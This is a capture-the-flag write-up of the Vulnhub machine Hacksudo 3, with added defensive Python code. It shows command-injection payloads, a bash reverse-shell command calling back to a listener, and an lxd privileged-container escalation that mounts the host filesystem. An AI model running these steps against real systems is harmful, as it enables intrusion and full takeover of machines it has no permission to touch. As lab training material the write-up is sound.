NepCodeX

Byte Musings: Where Tech Meets Curiosity


Hacksudo 3 Walkthrough – Vulnhub – Writeup


In this post, I am going to do the third machine of the Hacksudo series from Vulnhub. Hacksudo is one of the best series that I have done from Vulnhub, so I will be explaining all the steps in this walkthrough.

Link to the machine: https://www.vulnhub.com/entry/hacksudo-3,671/

Walkthrough of Hacksudo Proxima Centauri

Identify the target

As usual, I began the challenge with the discovery of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Next, I scanned the open ports on the target to see the exposed services.

sudo nmap -v -T4 -p- -A --min-rate=1000 -oN nmap.log 10.0.2.44

Only the HTTP port is open.

Enumerate web server

The default page of the server showed me some hints but they were of no use.


First, I ran directory enumeration on the server.

gobuster dir -u http://10.0.2.44/ -x txt,php,html --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir.log

There are many paths on the server, but most of them looked like personal projects of the author. The path generator.php, however, was an interesting one.


The reference to “smartness” appeared twice on the page; I had already seen it earlier when I looked at info.php.


Going on, the generator page converts text into a decorated form. However, the app suffered from command injection.

`id`

Another payload gave me a different output.

&& id

As we can see above, I got the user “www-data” as the result. Hence, I could inject shell commands through the application, so I decided to spawn a reverse shell.
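The bug behind the two payloads above is user text being concatenated into a shell command line. The following Python snippet is an added example (not the target's generator.php, whose source is not shown here) that contrasts the vulnerable pattern with a hardened one and adds a simple log check a defender could run. It assumes the decorating tool is an ordinary argv-taking command (printf stands in for it), and the access-log lines are constructed for the demo.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# Hypothetical Python stand-in for the "text generator" endpoint. The real
# application on the target is PHP and is not reproduced here; `printf`
# stands in for whatever decorating tool it calls.

def render_vulnerable(text: str) -> str:
    """The bug: user text is glued into a command line that /bin/sh parses.
    Backticks, '&&', ';' and '|' are shell syntax, so '`id`' or '&& id'
    execute as commands. Kept only for contrast; never call it with untrusted input."""
    cmd = "printf '%s\\n' " + text          # no quoting, no validation
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout

# Allow-list: letters, digits, spaces and basic punctuation, at most 64 chars.
SAFE_TEXT = re.compile(r"[A-Za-z0-9 .,!?'-]{1,64}")

def validate_text(text: str) -> bool:
    """True only if the whole input matches the allow-list."""
    return SAFE_TEXT.fullmatch(text) is not None

def render_safe(text: str) -> str:
    """Hardened form: validate first, then pass the text as ONE argv element.
    No shell is involved, so metacharacters are never interpreted."""
    if not validate_text(text):
        raise ValueError("rejected input")
    out = subprocess.run(["printf", "%s\n", text],
                         capture_output=True, text=True, check=True)
    return out.stdout

# Detection side: flag requests whose decoded query string carries shell
# metacharacters (the two payloads from this write-up would both trigger it).
SHELL_META = re.compile(r"[`;&|$(){}<>\n]")

def suspicious_requests(log_lines):
    """Return (client_ip, decoded_query) for each Apache-style access-log line
    whose query string contains shell metacharacters."""
    hits = []
    for line in log_lines:
        m = re.search(r'^(\S+) .*"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        ip, path = m.groups()
        query = unquote_plus(path.split("?", 1)[1]) if "?" in path else ""
        if SHELL_META.search(query):
            hits.append((ip, query))
    return hits

# Constructed sample log lines for the demo (not from the target).
SAMPLE_LOG = [
    '10.0.2.15 - - [01/Jan/2024:10:00:00 +0000] "GET /generator.php?text=hello HTTP/1.1" 200 512',
    '10.0.2.15 - - [01/Jan/2024:10:00:05 +0000] "GET /generator.php?text=%60id%60 HTTP/1.1" 200 530',
    '10.0.2.15 - - [01/Jan/2024:10:00:09 +0000] "GET /generator.php?text=%26%26+id HTTP/1.1" 200 530',
]

if __name__ == "__main__":
    print(render_safe("hello"), end="")
    for ip, q in suspicious_requests(SAMPLE_LOG):
        print("suspicious request from", ip, "->", repr(q))
```

The allow-list is deliberately narrow: rejecting anything outside a known-good set is more robust than trying to escape every metacharacter, and passing the value as a separate argv element removes the shell from the path entirely.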

So, I listened on port 4444.

nc -nlvp 4444

Then, I used the following payload to spawn a reverse shell.

`bash -c "bash -i >& /dev/tcp/10.0.2.15/4444 0>&1"`

Finally, I got the shell.


Then, I spawned a pty shell using python.

python3 -c 'import pty; pty.spawn("/bin/bash")'

# Ctrl+z
stty raw -echo;fg
reset

Get user shell

Since I had a foothold, I looked inside different directories. Some common directories that I always check are /, /var/www, /var/www/html, /opt, /etc, etc. Fortunately, there was a file “hacksudo” in /var/www which had some obscure content.

cd /var/www
ls -al
cat hacksudo

The content consists of jumbled words, so it cannot be a hash. Since it has words, the first thing that came to mind was a Caesar cipher. Hence, I opened CyberChef and added the “ROT13” module to the recipe.

https://gchq.github.io/CyberChef/


The text had been rotated 13 characters forward. Either way, we got the username and what looks like a SHA-512 hash. Therefore, I visited CrackStation to crack the hash.
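CyberChef's ROT13 module does the shift for you; to show what it is doing, here is an added example (not part of the original post) that implements the Caesar shift in Python and, going slightly beyond the ROT13 case, tries all 26 shifts and picks the one that yields the most recognisable English words. The sample ciphertext and the scoring vocabulary are constructed for the demo; the real file's content is not reproduced.

```python
def caesar_shift(text: str, shift: int) -> str:
    """Shift every letter by `shift` positions (ROT13 is shift=13).
    Case is preserved and non-letters pass through unchanged."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)

# Constructed scoring vocabulary; a real tool would load a word list.
COMMON_WORDS = {"the", "is", "and", "a", "of", "to", "user", "username",
                "password", "hash", "flag", "for", "below"}

def score(text: str) -> int:
    """Count tokens that are known English words (punctuation stripped)."""
    return sum(1 for w in text.lower().split() if w.strip(".,:;") in COMMON_WORDS)

def best_shift(ciphertext: str):
    """Try all 26 decryption shifts and return (shift, plaintext) with the
    highest word score. Ties resolve to the smallest shift."""
    candidates = [(s, caesar_shift(ciphertext, -s)) for s in range(26)]
    return max(candidates, key=lambda c: score(c[1]))

# Constructed sample standing in for the obscured file; it is plain text
# rotated by 13, which is what the write-up found.
SAMPLE = caesar_shift("username is hacksudo and the hash is below", 13)

if __name__ == "__main__":
    shift, plain = best_shift(SAMPLE)
    print(f"shift={shift}: {plain}")
```

Because ROT13 is its own inverse, applying the shift twice returns the original text, which is why the CyberChef recipe only needed the one module.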

https://crackstation.net/


The cracking was successful and we got the password for the user hacksudo. Thus, I logged in and captured the user flag.

su hacksudo
id
cd
cat user.txt

Root privilege escalation

The next step is root privilege escalation. Once I have the user flag, I generally look for sudo permissions, SUID binaries, the groups the user belongs to, unusual files, cron jobs, etc. As you can see from the previous screenshot, the user belongs to the group lxd. Since I have already done exploits for this, I directly moved on to check whether the binaries lxd and lxc are present on the machine.

Reference: https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

which lxd
which lxc

Both of the binaries were present. Hence, I proceeded with the exploit. Since the machine didn’t have access to the internet, I used the offline method.

On my local machine, I fetched the Alpine image definition, built the container image with distrobuilder, and then served the directory using Python’s built-in HTTP server.

# Install dependencies
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools

# Clone repo
go get -d -v github.com/lxc/distrobuilder

# Make distrobuilder
cd $HOME/go/src/github.com/lxc/distrobuilder
make

# Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml

# Create the container
sudo /home/kali/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

# Serve the directory
python3 -m http.server

On the target machine, I downloaded the image files and imported them into LXD.

# Get the images
wget http://10.0.2.15:8000/lxd.tar.xz
wget http://10.0.2.15:8000/rootfs.squashfs

# Import images
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list # You can see your new imported image

# Initialize the container
lxc init alpine privesc -c security.privileged=true

I got an error because there was no storage pool. So, I had to initialize one with the default values.

lxd init

Then, I re-entered the previous command and started the container.

lxc init alpine privesc -c security.privileged=true
lxc list # List containers

# Mount the root '/' of host to /mnt/root of the container
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

# Start the container and spawn a shell in it
lxc start privesc
lxc exec privesc /bin/sh

As you can see above, the root path ‘/’ is mounted at ‘/mnt/root/’ of the container. Hence, I could view the entire file system of the host machine. Finally, I captured the flag.
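From the defender's side, the whole chain above rests on two conditions: a non-root user in the lxd group, and a privileged container with the host's / attached as a disk device. The following Python audit script is an added example (not part of the original post or of LXD) that checks both. It parses /etc/group content and `lxc config show`-style output; both inputs are constructed here to mirror the situation in this write-up, and the field layout of the container config is assumed to match LXD's YAML output.

```python
import re

def group_members(etc_group: str):
    """Parse /etc/group text into {group_name: [members]}."""
    members = {}
    for line in etc_group.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        name, _, _, users = parts[:4]
        members[name] = [u for u in users.split(",") if u]
    return members

def risky_group_memberships(etc_group: str, watch=("lxd", "lxc", "docker")):
    """Return sorted (user, group) pairs for non-root members of container-
    management groups. Such membership is effectively root: the user can
    create a privileged container with the host's / mounted inside it."""
    found = []
    for group, users in group_members(etc_group).items():
        if group in watch:
            found.extend((u, group) for u in users if u != "root")
    return sorted(found)

def container_risk(config_text: str):
    """Inspect `lxc config show <name>` style YAML and report whether the
    container is privileged and which disk devices expose the host root."""
    privileged = re.search(r'^\s*security\.privileged:\s*"?true"?',
                           config_text, re.M) is not None
    host_root_devices = []
    current = None
    in_devices = False
    for line in config_text.splitlines():
        if re.match(r"^devices:", line):
            in_devices = True
            continue
        if not in_devices:
            continue
        m = re.match(r"^  (\S+):\s*$", line)      # device name, 2-space indent
        if m:
            current = m.group(1)
            continue
        if re.match(r"^\S", line):                # top-level key: left the block
            in_devices = False
            continue
        m = re.match(r"^\s+source:\s*(\S+)", line)
        if m and m.group(1) == "/" and current:
            host_root_devices.append(current)
    return {"privileged": privileged, "host_root_devices": host_root_devices}

# Constructed /etc/group excerpt mirroring the write-up (hacksudo is in lxd).
ETC_GROUP = """root:x:0:
sudo:x:27:
lxd:x:115:hacksudo
www-data:x:33:
"""

# Constructed `lxc config show privesc` output for the container built above.
CONFIG = """architecture: x86_64
config:
  security.privileged: "true"
  volatile.base_image: PLACEHOLDER_IMAGE_FINGERPRINT
devices:
  host-root:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
  root:
    path: /
    pool: default
    type: disk
ephemeral: false
"""

if __name__ == "__main__":
    for user, group in risky_group_memberships(ETC_GROUP):
        print(f"WARNING: {user} is in group {group} (root-equivalent)")
    print(container_risk(CONFIG))
```

On a real host, feed it `getent group` output and `lxc config show <name>` for each container from `lxc list`. The fix for the first finding is simply removing the user from the lxd group; the second finding is the artifact the attack leaves behind, so a container that is both privileged and carries a `source: /` disk device is a strong indicator worth alerting on.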

The Wireless machine from Vulnhub uses the same exploit; see its walkthrough: Wireless Walkthrough – Vulnhub – Writeup


